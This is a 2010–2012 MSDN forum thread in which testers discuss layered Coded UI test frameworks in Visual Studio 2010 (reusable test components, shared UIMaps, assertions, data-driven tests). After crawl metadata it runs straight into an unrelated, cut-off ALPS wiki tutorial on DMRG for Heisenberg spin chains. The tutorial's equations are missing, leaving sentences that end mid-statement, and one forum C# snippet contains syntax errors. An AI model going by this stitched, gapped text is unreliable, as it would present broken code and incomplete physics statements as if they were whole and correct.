Discussion about design of a custom testing framework that leverages Coded UI Testing in Visual Studio 2010 - Thursday, May 13, 2010 4:16 PMHello All, I want to discuss and get feedback about my ideas for creating a custom testing framework for our applications that leverages the Coded UI Test in Visual Studio 2010. I need to evaluate my current design. Definition: A UI testing platform is a system that provides interaction with the UI in an application under test. Coded UI Testing and Quicktest Pro are examples. Definition: A custom testing framework is a layer or several layers of basis functionality that provides levels of indirection between the testing platform and actual tests that will be executed. The tests call functionality from the custom testing framework, which manipulates the UI using the UI testing platform or provides custom functionality of some sort. These levels of indirection are meant to enhance maintainability and robustness of Coded UI Tests. In investigating Coded UI Testing I have found that recording of individual tests was often leading to very similar steps and UIMaps in each test. I have already gone through and have implemented multiple UIMaps. There is still a problem recording actions on a per-test basis though since for every test I am generating identical functionality. An example of this would be the logical group of actions called “open a project” which is a composite of many sub steps and is used in almost every test. It is therefore desirable to have a single method recorded or built by hand and stored in some library of functions that can be invoked when required. I would call these methods that implement logical groups “test components”. Definition: A test component is a test method existing in some layer of the custom testing framework that uses one or more UIMaps to manipulate UI elements to accomplish some specific task such as clicking an individual button, or to accomplish a logical group of actions such as opening a project. Test components can be identified by their common patterns in many tests. There are two types of test component. An “atomic test component” might perform some number of actions against the UI, but will never reference other components. That is, an atomic test component only uses the UIMap to manipulate UI elements. The second type of test component is a composite test component that is built from atomic components and composite components. Each test component will require access to one or more UIMap(s) to function. Since each test component will be implemented as a “test method”, the exception handling mechanism that provides results for tests can still be used and will filter up through the hierarchy of components in the custom testing framework. Since a test component is either atomic or is a collection of test components, and any test component is handled in the same way whether it is atomic or a collection, this is somewhat analogous to the composite design pattern except not in the context of object construction. A good example of a composite component is the “open a project” test component. This method would take the name of the project to open as a parameter and use atomic and potentially other composite components to execute the logical group of operations that open a project. The UIMaps used by such components are a little bit of a concern. The UIMap used by the “open a project” method also exists in the library and as such is not duplicated in multiple tests. Thus at the beginning of most tests, the test author will have to insert a call to the “open a project” method. Unfortunately as far as I can see at this point, this seems to break the test recording model since the Coded UI Test builder doesn’t provide a way to indicate a call to a method in the library instead of recording a new UIMap and method. Ultimately the goal is to provide a comprehensive set of test components implementing logical groups of actions such that a test creator can avoid duplicating functionality and quickly assemble a test by calling the appropriate components. The testers here have limited development experience, but are in the process of learning the basics. Hopefully in the long term, anyone from the most experienced developer to the programming challenged will be able to create automated tests that are maintainable and robust. With this model in mind, the recording functionality in VS2010 will be used only for creating the library of logical groups of actions (test components) and for per-test functionality that has not been included in the library at the time of test creation. This is ok, but it is note ideal and it would be nice to be able to extend the Coded UI Test Builder to add calls to the component library when required. A more serious problem lies in asserting or checkpointing values using the test creation. While there may be some common assertions or checkpoints included in the library of components, for all tests there exist test specific expected values. These test specific expected values must be stored in each test or in some structure defined to hold them; perhaps a CSV file. Since the UIMaps for everything lie in the application specific library of methods, using the assertion creator of VS2010 will not reference the library UIMaps and will thus try to create a per test UIMap that may duplicate some of the library UIMap for that portion of the application under test. This may even be desirable in some cases, but it still creates a potential maintainability problem. In most cases it would be better if the assertion recorder and generator could generate expected values in a UIMap that subclasses (inheritance) one of the library UIMaps. Another useful way to do things would be to allow the assertion generator to add expected values to some file such as a CSV or Excel spreadsheet. The UIMap subclass situation would be ideal since a test can call its recorded assertion methods that exist local to the test, and these methods would be able to use the preexisting UIMap to verify expected values. As far as I know, using the Coded UI Test Builder in this way is not possible at this time and as such, assertion methods need to be provided via the library of test functionality. Somehow the test specific expected values need to be accounted for, but they cannot be recorded without duplicating UIMaps; undermining the usefulness of the recording tool. I must make a design decision and balance the tradeoffs of maintainability and ease of use in whatever system I implement. Making a component-wise library of functionality will provide maintainability and scalability, but will require much more development time initially and could potentially be more difficult to use for non-developers. That said, I believe maintainability and robustness of the system is the highest priority for our automated testing system due to personnel constraints. I do not want to get bogged down maintaining old tests; I would rather build new tests and have to perform simple fixes to components used in older tests. I have defined three levels of testing functionality as follows, each of which is a “test project” inside a “testing solution”. Each test project is compiled to a .dll and is referenced in the next higher level of functionality. These levels are as follows, 1. The top level (level 1) is the common functionality that will be used in testing all of our software products. Examples of this are something like bitmap checkpointing, which any individual test might need to use. 2. The middle level (level 2) is the application dependent test functionality (test component) provider. This level is where all UIMaps exist and where the definitions of recorded or hand built atomic components and composite components exist. 3. The bottom level (level 3) contains the actual tests that will be executed. These tests will call test components from level 2 to perform some common actions such as “opening a project” and will also allow use of recording for per-test steps. These per-test recordings will allow the components from level 2 to be glued together to accomplish tasks for which there has been no test component defined in level 2. If it is found that all or part of these per-test recordings are being duplicated across different tests, then the common pattern can be extracted and will be a strong candidate for promotion to level 2. I would like to know what anyone thinks about my design, and if anyone else has tried something similar. I am concerned about this design cutting out much of the recording of actual tests, but at this point I feel that once a large number of tests are created, this framework will make the tests more maintainable. Please give me your feedback and any ideas you have. Any input is welcome! I am trying to learn how to maximize the effectiveness of my testing project, and how to leverage VS2010 properly. Best regards, Elliot All Replies - Monday, May 17, 2010 2:38 PMModerator Elliot, That's a very well designed test framework. Couple of questions 1. If there is any change in the UI components of your application, you will change only your middle level (level2), right? 2. Any change in the functionality of your application, from what I understood, you will change the bottom level (level3), right? 3. Can you share with us what are the difficulties you saw/see if you take the "Recording the tests" approach? I understand, it gives you great control if you hand-code your scenarios/logic as you have in your framework. In fact, that is one of the reasons, we have such a rich UIMap. Thanks, Vishnu Please mark this post as answer if this answers your question - Monday, May 17, 2010 10:26 PMHello Vishnu, Thanks for the quick response. The support I have found on this site is great! Answers to questions: 1) Level 2 (the library of test components) exists to try to minimize the changes required to level 3 if a UI change in the application under test happens. Ultimately it would be ideal if all tests in level 3 are totally decoupled from the UI in the AUT via level 2 test components that provide the functionality of Coded UI Test via indirection. In this situation all tests to be run would not require any change if the AUT UI changes. This is an ideal situation and it is unlikely to be fully realized, especially while level 2 is not fully mature. Test components in level 2 will provide functionality for the most common patterns in the workflows in the AUT, but some tests will require per-test functionality that is not used outside of the test under consideration. As such, if there is an AUT UI change, it may break per-test functionality, but this is an expected scenario. The benefit of having level 2 provide common patterned functionality is that in general these patterns will be used for the common logical groups of operations that are used in most or at least more than one test. As such, if UI changes happen in the domain of the level 2 test components, only level 2 components need to be changed, and it is likely that the changes will be localized by design. So the answer is that if UI changes happen level 2 will need to be altered, but it is possible that level 3 will also need to be altered. However level 2 will hopefully provide enough indirection between level 3 and the Coded UI Testing of VS2010 that level 3 tests will be insulated from changes to the AUT UI. Hence changes to level 3 (which contains the tests and hence is the largest maintainability liability) will be minimized. 2) Application functionality changes could possibly only require level 3 changes, although I am not sure that functionality changes will happen without some UI changes. If the UI changes or changes happen to a very common workflow such as opening a project, then level 2 will also have to change to reflect this. This is the point of level 2 though since if a common pattern such as opening a project was to change, it would likely be used in many tests and as such we only want to maintain the test component that implements it in one place, rather than changing the multitude of tests. But yes, I think I know what you meant about this, and that application functionality tests are actually happening at level 3. So for example if more tests are added, they can be added right into level 3 using functionality from level 2 to provide pre-built test components for doing common things. If a test is changed in form, it should only have to change in that test in level 3. 3) This is more complicated to answer but I will try to describe it fully. I did some more thinking and there is really no problem with recording to create test components, it’s just that you never record in a test, only in the library of test components. If we try to record actions in a test directly, the Coded UI Builder will create a new UIMap in the test project (level 3). Thus we must either want to create per-test functionality that will not be used in other tests and this will be recorded against a local UIMap, or we must want to record some reusable component in the library of test components (level 2). So recording is no problem, except that the aim is to have to record in an actual “test” as little as possible and code the test up as a series of method calls. It might be nice if one could point the Coded UI Test builder at the library of test components and do some auto generation along side per-test recording, but this is not required for my system to work. Recording assertions is where I see the most problems due to duplicating UIMaps over many tests and also the library UIMaps. The following scenario will happen; each test has its own set of expected values and these can not be stored in the library of test components. As such to use the Coded UI Test Builder to record an assertion and have it create the expected values per-test, one must record locally to a test, which will create a new UIMap that duplicates some of the already existing library (level 2) UIMap. This will directly undermine the whole purpose for introducing level 2 since if anything in the UI of the program changes, it is likely that this change will still break a test in two ways. First the library will be broken and need updating. We expected to have to do this work since the purpose of the library is to absorb the brunt of the work of making changes to the tests and enable us to apply the change in only one place. The second way that a test will be broken is that the assertions rely on a UIMap that contains duplicate information that is now broken. So all the assertions would need to be re-recorded for each test in my model. This is not really an option and a solution must be found or I might as well just record each test and try to maintain them all rather than building the framework. I have come up with two possible solutions. The first solution is simply building assertion methods into the library of level 2 and not ever use the Coded UI Test Builder for recording any assertions. For example some textbox needs to be checked for a value but this textbox is commonly used in the library (level 2) so we provide a method called assertTextboxX in level 2 that takes the expected value that is stored on a per-test basis. This assertTextboxX method then returns or throws an exception compatible with the Coded UI Test exception handling. In this way the library needs to supply an assert method for each element that might need to be asserted. The second solution will allow the use of the Coded UI Test Builder, but it will need to be modified to work. The Coded UI Test Builder would need to be aware of any UIMaps that are used from the library (level 2). When someone goes to record an assertion, we know that it is likely that at least some UI elements exist in a UIMap in the library and so the test builder could be made aware that a UIMap may subclass some other UIMap. We could subclass a UIMap and inherit all the information about the UI elements and any built in assertions that are common to the library. Then the Coded UI Test Builder could add the appropriate code to the “test local” UIMap that is derived from the library UIMap class. This will expose all the functionality for interacting with the UI Elements without introducing duplication of the UIMaps from the library and allowing the Coded UI Test Builder to add the appropriate assertion expected values to the subclassed UIMap without fear of breaking anything in the library. I hope that is an acceptable answer. Thank you again for your time. Best regards, Elliot - Tuesday, May 18, 2010 2:54 PM Hi Elliot, Your design is indeed a great one. I have implemented something similar but using different tools. We are not on Visual Studio 2010 yet but use the Microsoft UI Automation Interfaces for automating our application. The approach we took is very similar to yours, there was a need to allow non-developer testers to write robust and maintainable UI Tests so we wrote a framework that leverages Windows Workflow. We home grew our solution due to Microsoft not having a UI Test tool at the time but have found that it works very well. Level 1 in our system is an underlaying framework that provides common items like logging, generic control manipulation and other items that are generic such as starting/stopping the AUT, etc.... This is a non-application specific level and is the underlying framework for level 2. Level 2 is the Windows Workflow Activities that are built on top of the framework. Each component (such as LogIn or CreateNewOrder) is developed as a Windows Workflow Activity and becuase Windows Workflow allows for composite activities, we only have to drag and drop to build complex composite activities for use in the designer. There are just a couple of us that maintain these activities. Level 3 is the Windows Workflow Designer. The Workflow Designer provides a very easy drag and drop interface for testers to create tests. Each test case (or Workflow) is serialized out to XML and checked into source control. As for the UI map, we use an XML file to specify the identification properties required to ID controls on screen. Custom code was written to find controls on screen for use in the automation client. The XML file also uses a Single File Generator in Visual Studio to generate and properly subclass control types (for example, if we specify that a control is of type Button in the XML UI Map, then a class is generated that derives from the Button class in our automation framework, thus exposing all typical button functions to that control). Maintainability works pretty well in this model like it seems like it would in yours. I never put much stock in being able to record/playback scripts, it always looks cool but it never seems to work out in practicality (maybe Microsoft's new tool addresses this though). Mike Watkins - Tuesday, May 18, 2010 5:30 PM Hello Mike, Thanks for the information. I am only vaguely familiar with Windows Workflows but what you mentioned sounds very interesting. I will make an effort to check Workflows out. Best regards, Elliot - Thursday, June 24, 2010 2:42 PM Mike, I'm glad to run across someone else trying to take this approach. Can you recommend a good way to come up to speed on Windows Workflow? Paul Ebert - Thursday, June 24, 2010 3:14 PM All, Very interesting topic - I myself am in the middle of the same scenario and am implementing a similarly tiered framework: Level 1 - common functionality: Reporting, Low level object interactions etc... Level 2 - AUT actions: Login.. etc. etc. Level 3 - Testcases: a combination of Level 2 actions I'm currently looking at how best to implement my Object library. I want to keep it pretty lightweight but want to maintain the Object descriptions along with more semantic information [localisation id's and the likes] so intend to wrap the descriptions in a generic object class. I'd be interested in your approaches to describing and locating objects - I've found with most other tools I've used that's it's useful to describe them hierarchically since very similar objects may only be differentiated based on a parent object. From what I've generally seen described with VS is that they get described uniquely and there hasn't really been any mention of finding objects from a parent object. cheers, Graham - Thursday, June 24, 2010 4:06 PM Hello Elliot, I have implemented a similar model for my application. I prefer hand code rather than recording as record/play tends to create maintainability problem later. In answer for the third question, you mentioned about building assertion methods into the library of level 2. I would like to add this approach is working fine for me as well. Everything looks good till here. But the problem comes when I have to create data-driven test. Like you have "open a project", my application requires user credentials and based on those credentials, home page vary from person to person depending on what functionalities user has permission to. I created test methods at level3 where I call the methods from level2. Now, each of my test method starts with Login and ends with logout with some functions in between. Problem occurs as I need to have multiple data driven functions in a single test method for login as well as for the functions in between login and logout method. I include CSV for my login data in the test method but using embedded resource file for the inner function's data. Will this create a problem in future? Any inputs will be appreciated. Thanks - Monday, June 28, 2010 6:33 AM Hi All, I'm glad to hear that I'm not the only writing coded UI tests by hand and foregoing the recording interface - Monday, June 28, 2010 11:23 AMSure - I purchased Bruce Bukovics book - Pro WF (ISBN: 978-1-4302-0975-1). This was my main source of information when I was learning it. Mike Watkins - Monday, June 28, 2010 11:30 AM Hi Graham, I found that using XML to describe my object hierarchically works pretty well. I developed a Single File Generator that takes the XML and generates the objects into classes that I can use (e.g. a Button control gets a class that derives from Button). You can then use the TreeWalker to get the controls from the screen (using the identification attributes described in the XML). Mike Mike Watkins - Wednesday, June 30, 2010 12:38 AM Great topic and I'm glad to see some other folks thinking along these lines. I am coming from a Quick Test Pro world as a pretty experienced developer. I am looking at CodedUI to see how I can shoehorn my framework into the structure of how VS2010 is put together, which admittedly I'm pretty ignorant of right now. My QTP implementation is similar to those detailed above with some differences. First, taking the advice of several veteran QTP folks I bypassed the Object Repository altogether in lieu of a database solution. For those not familiar with QTP, it uses an internal object repository that stores objects and their properties and makes them accessible/editable, etc. via a decent GUI that you can use to explore, add new, modify, etc. objects. For reasons I won't go into here, it could become problematic to deal with this repository in large scale implementations. I instead chose to implement a SQL Server based object repository where I have tables set up to store objects and their properties and via utility functions that I created, I am able to programmatically create an object at run time with the appropriate properties for the object based on the action to be taken. So to 'diagram' my framework: Level 1 - Object database - Contains definitions for all application specific and product suite common controls that are utilized by the test cases. A typical Object would have a 'friendly' name(this is how the control is accessed in the code), an AUT property(application specific or common), and the actual Object properties - Object type(WebEdit, WebButton, etc.), Object properties(html id, html tag, innertext, outertext, etc.). Each time a new major revision is built, the prior revision Object Database is promoted as the starting point for the new product revision. Level 2 - Common function library - Contains wrapper functions for clicking, getting, setting, etc. controls. These wrapper functions serve to retrieve the object properties from the Object database, validate their presence in the application, perform the desired action, and write a log file entry for the status of the operation. Level 3 - AUT actions, login, add an address, etc. Level 4 - Test cases - combines AUT actions into a series of calls that make up an application work flow. The vast majority of my updates happen at level one since I am dealing with a mature product where the UI doesn't change a lot and since I use the friendly name to access the object in the code, if an object changes, I only need to update the changed properties and never the code accessing the object. The entire suite is data driven comprising of tables that represent the individual screens in the application. This data is queried as the script runs and drives the scripts to navigate to specific screens, populate/interact with specific controls in the application, etc. Overall the design has proven to be a robust design and easily maintainable. The SQL based object repository lowers overhead as well since I can deploy my scripts to any machine with QTP and as long as it can see the SQL server on the network then it can run the test suites. There is no need to pass around a suite specific UI map. I would like to implement a similar design in VS2010 and am not sure how it can be done just yet. If anyone has any insight into how I might accomplish something of this degree I would appreciate any tips. I'll pledge to post my findings back to this thread as I move forward. -John - Wednesday, June 30, 2010 12:20 PM John, I am in the same situation with you. With QTP, I don't used to recording. In stead, I used expert view to write code directly from OR. I get my hands on the VS probably a month now and I am feeling ignorant. Todate, I learn that VS does not have anthing close to OR. it appears to me that recording a must. And each recorded script will own it UI map. For those who is experience with VS, please correct me if I am wrong. I am learning. - Wednesday, June 30, 2010 3:21 PM If you don't want to use the UIMap or the code builder from VS, you will still be able to create automatic tests (like you did in QTP, I assume you used DP for some objects). For example, to set a text for an editbox you can use: BrowserWindows browser = new BrowserWindow(0; browser = BrowserWindows.Launch(nwe System.Uri(address)); HtmlEdit edit =new HtmlEdit(browser); edit.SearchProperties.Add("Id","editBoxID"); edit.Text = "test"; Or you can create your own map. You can use the code builder to add the map and all the objects to the map, and after that you can manually edit the map, by adding/changing the object properties, by adding new objects,..... After that, all you need to do is to generate the .cs class and you will be able to access the objects almost in the same way as in QTP. - Wednesday, June 30, 2010 11:28 PM @Silviu - Thanks for the information. I'll create a small project and try to implement your suggestions above. To answer your question regarding DP, my entire framework is implemented using DP, not one control exists in the QTP Object Repository. I take an undocumented approach however in that I use inline DP via the Eval statement, this reduces code and makes maintainability easier. I'll probably be back to pick your brain as I move forward with this endeavor. @NewToVS - Like you, I do not use the recorder, everything is coded by hand. I treat it as a software development project. I am going to try out Silviu's suggestions to see how closely I can get a CodedUI Framework to resemble the design of the framework that I've implemented in QTP. I'll post my progress here. -John - Thursday, July 08, 2010 12:32 PM Hello All, I want to discuss and get feedback about the ideas I have tried for creating a custom testing framework for our application using VSTS 2010. Firstly, to modularise I have tried to develop the framework with scripts depending on Page wise actions in our application. Considering the Person creation module in our application first,the user needs to login and successful login lands up in the Person Lookup page. In this page, we have the NEW button that takes the user to Person Maintenance Page which is where a person can be created.The Person Lookup would have other operations like SERACH A RECORD or RESET the data entered in textboxes. In order to implement Person creation I have kept 3 testmethods in CODED UITest .cs file as follows: 1.Login testmethod -to perform the actions for LOGIN PAGE 2.PersonLookup testmethod- to click NEW button for Person creation 3.Person Maintenance testmethod- to create Person record with actions like SAVE and Refresh I also have a Class file where I have defined methods to construct UI Controls(HTML textbox, combo box, Button etc.) required for every action to be performed like entering Username and Password and Login button.These UI Controls would be built dynamically with data driven from a CSV file. This CSV file has inputs like the control's ID and Name and also the actual value to be entered after constructing the control.The same Class file also has the Helper methods defined based on the Functionality to be perfomed( like Login, Click NEW, Create Person) The code flow would be like: [testmethod] This test method has input data(Control Id and Name) for constructing different UI Controls for Login Page from a CSV file: public void Login() { string url = testContextInstance.DataRow[0].ToString(); string browsername = testContextInstance.DataRow[1].ToString(); .................... different inputs required for this method TestRunner tr_construct_BW = new TestRunner(); tr_construct_BW.Login_app(url, browsername, classname, windowtitle,userid_id, userid_name, Username, pwd_id, pwd_name, pwd, LoginBtn_id, LoginBtn_Name, btn_type); } Login_app() { Launch_Browser(url, browsername, classname, windowtitle); construct_HTML_Document(bw, windowtitle); construct_HTML_Textbox(document, userid_id, userid_name, Username, windowtitle); construct_HTML_Textbox(document, pwd_id, pwd_name, pwd, windowtitle); construct_UITestcontrol_Btn_Submit(document, LoginBtn_id, LoginBtn_Name, btn_type, windowtitle); } A sample method to build the textbox control in the same Class file as the Helper methods construct_HTML_Textbox(HtmlDocument document, string Id, string Name, string Value, string windowtitle) { HtmlEdit textbox = new HtmlEdit(document); textbox.SearchProperties.Add("Id", Id); textbox.SearchProperties.Add("Name", Name); textbox.WindowTitles.Add(windowtitle); textbox.Text = Value; } In this same way I have defined other 2 test methods for Person creation. The issue I face here is that during multiple Person creation( which means,[Person Maintenance] testmethod needs to be iterated until there are no more rows in csv file) after I login, click NEW in Person Lookup screen and move to[ Person Maintenance screen to create a Person, I need control over the NEW button again to create another Person for which I need to call the testmethod [Person Lookup]. But I'm unable to do this , may be due to contraints defined in using a test method. Calling a testmethod within another might not be possible. Does anybody know any alternative idea to continue in this way of implementation? How would I get control over the control (NEW BUTTON)again to continue with multiple person creation?I would also like to know about the feedbacks for this kind of design, and if anyone else has tried something similar please share that too. PRIYADARSHNI - Wednesday, September 15, 2010 3:05 PM Hi, We have also implemented a similar framework but we have to implement local UIMaps for individual solutions/projects. The idea of having a common/shared object library seems great in case there is any change in the object properties we have to change it at one place thereby reducing maintainability. We have teams working at different locations on the same product with different configurations and we have no common/shared repository where everyone can have access. This makes it difficult to share the UIMap accross teams. Instead, we have a common namespace with a partial class wherein we can keep the common code with common object repository. (Something similar to tier 2 in the first post of the thread) The arcitecture of the framework is something like this: Tier 1: The master script or the ordered test that calls the scenarios (Tier 2 with Test methods) Tier 2: The Scenario script with calls to the test methods present in the Partial UIMap class. Tier 3: The UIMap with the methods/actions along with the local object repository/UIMap. Apart from these we have the common name space(Support solution, as we call it) with partial classes that have code for all the common functionality, generic as well as application/product specific. We have a number of automation scripts/solutions/projects that have their individual components for all the three tiers but with only one common Support solution. I request everyone to please give their feedback on the arcitecture and discuss as to what improvements are required for a low maintainability. A shared object repository/library will be a good idea without any proper source control tool or not. Please let me know if I need to elaborate on the architecture. All the inputs will be highly appreciated. Regards, Pankaj - Edited by pankaj.nithMicrosoft Community Contributor Wednesday, September 15, 2010 3:06 PM typo - - Wednesday, September 29, 2010 11:05 PMCan someone post the code with the example? We also have a similar problem with automating same application for multiple countries. - Monday, October 04, 2010 9:03 PM Hello Meetsachinhere, Sorry for the delay in my reply, I had not been getting emails about this thread being posted. Anyways, the way I do this sort of thing is to store the data in an Excel or CSV file like you mentioned. Often I iterate the test for every row in the spreadsheet and pass the appropriate data around. I think I understand what you are asking, but I am not 100% sure. Each iteration has its input parameters and expected results; I don't immediately see a problem with your method. Although at this time I prefer to keep the data stored in data files that are not managed by source control. It sounds like you will have a lot of conditional branching in your tests. In my opinion, the more branching a test takes into account, the more likely this test is a candidate for re-factoring and being broken up into smaller more targeted tests. If I have not answered your question please write back. Best regards, Elliot - Wednesday, July 27, 2011 9:18 AM Can any one send to me the Folder structure for Coded UI automation? Suresh D - Thursday, February 16, 2012 10:52 AM Hi, We have windows application to automate, please provide us the fodler structure for CODED UI automation sowmya - Thursday, March 08, 2012 10:54 PM We are creating a similar custom framework around VS 2010 Coded UI. However we have run into a architectual discussion on where we should throw our asserts (pass/fail). Currently they are thrown from the UI Map, but we were wondering if we could instead pass the UI Map "control" or test result to the calling method and throw the assertion at that point. Is there a specific reason why the UI Maps hold the asserts? Thanks Sophia Johnson QA Director MediMedia - Tuesday, May 01, 2012 2:41 AM Hi All The original post here is almost 2 years old, I am curious to know how people have progressed with the development of a workable framework solution. Like a couple of posters here I have come from a QTP back ground. I was part of a team that created an Automation Framework for QTP this is now a commercial product marketed by a previous employer. This framework solution gave the users a GUI to build automation in a plain English wizard. The one thing we did use was the QTP Object Repository tool this was used to create a map of the AUT for the GUI wizard to use. There was scope for some DP objects. The process of building a test was straight forward in the GUI the tester would select an object against that object there were pre-defined methods. The method was selected and an action or data input was set. All the steps required were built and saved to a database. Coded components could also be called along with the keyword steps created in the wizard. The GUI was also used to assemble modular test components created. So if small reusable assets were created these could be called as group to form a larger test. At runtime the test is assembled from the database assets and the actual QTP script is created at runtime in memory. The actual scripted QTP code never exists outside the runtime memory. The test at runtime is seen as a complete QTP test that can be run direct from the GUI, QTP or Quality Centre. The Object Repository is referenced it becomes associated at runtime as well. There has been some work in writing an engine for CodedUI Automation to go with a version of a similar framework structure as mentioned above. This Automation Framework development process started around 3 years ago in an Excel based prototype. So I am very curious to see what progress has been made with the framework discussed here.
http://social.msdn.microsoft.com/Forums/en-US/vsautotest/thread/944b33b3-f650-4dd8-a035-c807cbb2aadf/
crawl-003
refinedweb
6,526
57.81
Custom 24 Responses to “Customizing ‘Reverse Engineer Code First’ in the EF Power Tools” Where's The Comment Form? I’ve been contemplating using “Code First” in a new project I’m working on, but I enjoy developing the physical datamodel for the database the ‘old-fashioned’ way – so hearing about these reverse engineering tools helps to solidify my decision to use it. Thanks for the post. Calvin May 10, 2012 Rowan, any way you could start up a CodePlex or Github project for these templates, so we could more easily contribute improvements by forking the project? bmsullivan May 11, 2012 Are there any ways to control the table names that get generated from code first reverse engineering? I’m would like to use this tool against an existing db, but there’s too much work involved in renaming tables after the tool generates code. Does the tool allow for some kind of mapping? Or, if not, how would I update the templates to use a custom mapping? Thanks Amon-Ra Mackie May 22, 2012 Hi Rowan, will be an RC version of the power tools soon or directly RTM? cheers, johannes Anonymous July 10, 2012 I have been unable to get this to work. I first followed the tutorial and when I ran the “Entity Framework > Reverse Engineer Code First” it seemed to ignore the templates and resulted in the same mappings that it created without the templates. Thinking I must have done something wrong I downloaded your templates, deleted all the files created from the previous attempt, cleared out the app.config file of any connection strings an ran it again … again it behaves as if it is ignoring the templates. Am I missing something? Gary July 24, 2012 Just tried this Rowan and it still generated fluent code and not Data Annotations. Seems like it didn’t read the changes I made? Any clues? Thanks, Peter August 7, 2012 Did you save the changes to the .TT files before re-running them? Louis February 3, 2014 I just want the reverse engineering to leave my table names alone, in all context. I don’t use spaces or underscores, but table names like Status become Statu. I have played with the plural vs singular and get varying results. I want my output to be, for example, DbSet Status and DbSet Contact (not DbSet Contacts ) This really can’t be that difficult. mbowles201 August 13, 2012 I get the: Compiling transformation: The type or namespace name ‘EfTextTemplateHost’ could not be found (are you missing a using directive or an assembly reference?) How do you get rid of it? I don’t want to be left with a compile error? Chris Nevill August 24, 2012 Roam, How to disable the pluralization on the T4 generation? This templates allways use pluralization on the relationships. Giovane August 27, 2012 Do you have any solution to get rid of this? Nico August 15, 2013 Hi! I am starting a new app and would like to use the code first with an existing database approach. But it turns out to be a very big database, from which I just would like to pick a small subset of tables. Is it possible yo reverse engineer just a subset of tables from an existing database? Jaime Mtnz Lafargue (@jaimeml) September 6, 2012 I am trying to generate code for some oracle tables, the first I see is (via ODAC tools for VS) error 6003: Schema specified is not valid. Errors: (1,607501) : error 2019: Member Mapping specified is not valid. The type ‘Edm.Decimal[Nullable=False,DefaultValue=,Precision=38,Scale=0]’ of member ‘ITEM_DIVISION’ in type ‘dboModel.ITEM_DIVISIONS’ is not compatible with ‘OracleEFProvider.number[Nullable=False,DefaultValue=,Precision=3,Scale=0]’ of member ‘DIVISION_ID’ in type ‘dbo.DIVISION_SHIPPING_LOCATIONS’. see dbo, oracle don’t have any schema called dbo (its sqlserver stuff), also, it fails to generate code when the column size is number(38), Is there any way to fix these issues? I was able to generate code where tables don’t have number(38). Also, I hate when the all caps classes (by default tables definition in oracle is all caps), Is there a way to convert the following: public class DEPT { public DEPT() { this.EMPs = new List(); } public short DEPTNO { get; set; } public string DNAME { get; set; } public string LOC { get; set; } public virtual ICollection EMPs { get; set; } } to public class Dept { public Dept() { this.Employees = new List(); } public short Deptno { get; set; } public string Dname { get; set; } public string Loc { get; set; } public virtual ICollection Employees { get; set; } } shashi September 20, 2012 […] Podemos modificar estas plantillas para que su comportamiento sea diferente, quitar los mapeos, evitar la pluralización en nuestras entidades, etc. Pincha el enlace para cómo,. […] Ingeniería inversa con EF Power Tools para Code First | Las cosas de David November 27, 2012 Hi Rowan, I want to add another template to generate Dto classes. I copy and paste Entity template and changed name from Entity.tt to EntityDto.tt. Then ran reverse engineer toll. But it is not generating Dto classes. Could you please help me that can i include new template in EntityFramwork Power tools? Ravi Potturi December 20, 2012 I ended up slightly modifying the files from Saber Soleymani since they resulted in some odd indentation for me. I made a repo in case others want to do pull requests, but hopefully if/when there’s a more official repo for customizing these templates, we can move them there. :) manningj December 30, 2012 Whoops, forgot to include url for repo :-/ manningj December 30, 2012 Wondering, how would one add another tt template file, to generate another set of say, business object using the same approach as the Entity and have that executed? Or where would I find the doc’s that explain this item. ScottO February 4, 2013 […] by modifying the templates that are used to generate code. You can find an example of this in the Customizing ‘Reverse Engineer Code First’ in the EF Power Tools […] Code First to an Existing Database | vuongquyen June 3, 2013 […] The code that gets generated by the reverse engineer process can be customized by modifying the templates that are used to generate code. You can find an example of this in the Customizing ‘Reverse Engineer Code First’ in the EF Power Tools post. […] Code First to an Existing Database | technic8x June 20, 2013 When i use a custom data type such as “public MultiSelectList lstQualifications { get; private set; }”,then causes error “Value cannot be null. Parameter name: key” How can i get rid of this problem. cseppd September 1, 2013 […] Luckily, it is possible to modify the templates by including them in the project. […] Improve navigation property names when reverse engineering a database | Ask Programming & Technology November 8, 2013 Is it possible to create multiple DbContexts for multiple databases? The last time I checked, you could not do this with Code First. jinksksee March 13, 2014 Any way to have the models generated into the project’s root directory? I want my project to be called Models, so I don’t want a models folder inside that. Thanks! Dirk Watkins (@dirkwatkins) November 8, 2012
http://romiller.com/2012/05/09/customizing-reverse-engineer-code-first-in-the-ef-power-tools/
CC-MAIN-2015-22
refinedweb
1,201
61.87
mvolkmann 1 Package by mvolkmann - liner This is a simple Node.js module that reads lines from files and streams. It supports both old and new style streams. 13 Packages starred by mvolkmann - async Higher-order functions and common patterns for asynchronous code - eventemitter2 A Node.js event emitter implementation with namespaces, wildcards, TTL and browser support. - express Fast, unopinionated, minimalist web framework - expresso TDD framework, light-weight, fast, CI-friendly - jake JavaScript build tool, similar to Make or Rake - jshint Static analysis tool for JavaScript - liner This is a simple Node.js module that reads lines from files and streams. It supports both old and new style streams. - mkdirp Recursively mkdir, like `mkdir -p` - optimist Light-weight option parsing with an argv hash. No optstrings attached. - request Simplified HTTP request client. - rimraf A deep deletion module for node (like `rm -rf`) - strata A modular, streaming HTTP server - underscore JavaScript's functional programming helper library.
https://www.npmjs.com/profile/mvolkmann
CC-MAIN-2015-14
refinedweb
155
58.99
Difference between revisions of "ALPS 2 Tutorials:DMRG-01 DMRG" Revision as of 16:39, 5 December 2011 Contents - 1 Models: Heisenberg Spin Chains - 2 Running The Code - 3 Ground State Energies - 3.1 Fixed Length Ground State Energies - 3.1.1 The one dimensional S=1/2 Heisenberg chain - 3.1.2 The one dimensional S=1 Heisenberg chain - 3.2 Ground State Energies Per Site (Bond) Models: Heisenberg Spin Chains For applications of DMRG, we consider two models, namely the spin-1/2 and the spin-1 antiferromagnetic Heisenberg chains of length L given by the following Hamiltonian, . The reason why we are choosing these two models, which you may already know from other tutorials, is that despite their superficial similarity they exhibit completely different physical behaviour and pose very different challenges to the DMRG algorithm. Let us briefly review their physical properties. Spin-1/2 Chain The ground state of the spin-1/2 chain can be constructed exactly by the Bethe ansatz; we therefore know its ground state energy exactly. In the thermodynamic limit the energy per site is given by Ground state energies as such are of limited interest if not compared to other energies. But this one can serve as a beautiful benchmark of the DMRG method. Of more interest is whether the ground state is separated from the excited states by an energy difference that survives also in the thermodynamic limit, i.e. whether the gap is vanishing or not. For the spin-1/2 chain, the gap is 0. At the same time, one may ask what the correlation between spins on different sites looks like. One knows for the infinitely long spin-1/2 chain that asymptotically (i.e. for ) . This means that the spin-1/2 chain is critical, i.e. the antiferromagnetic correlations between spins decay with their distance following a power law; in this case the exponent of the power law is obviously . There is also an additional square root of a logarithm correction which can be beautifully verified by DMRG calculations on very long chains, but given the 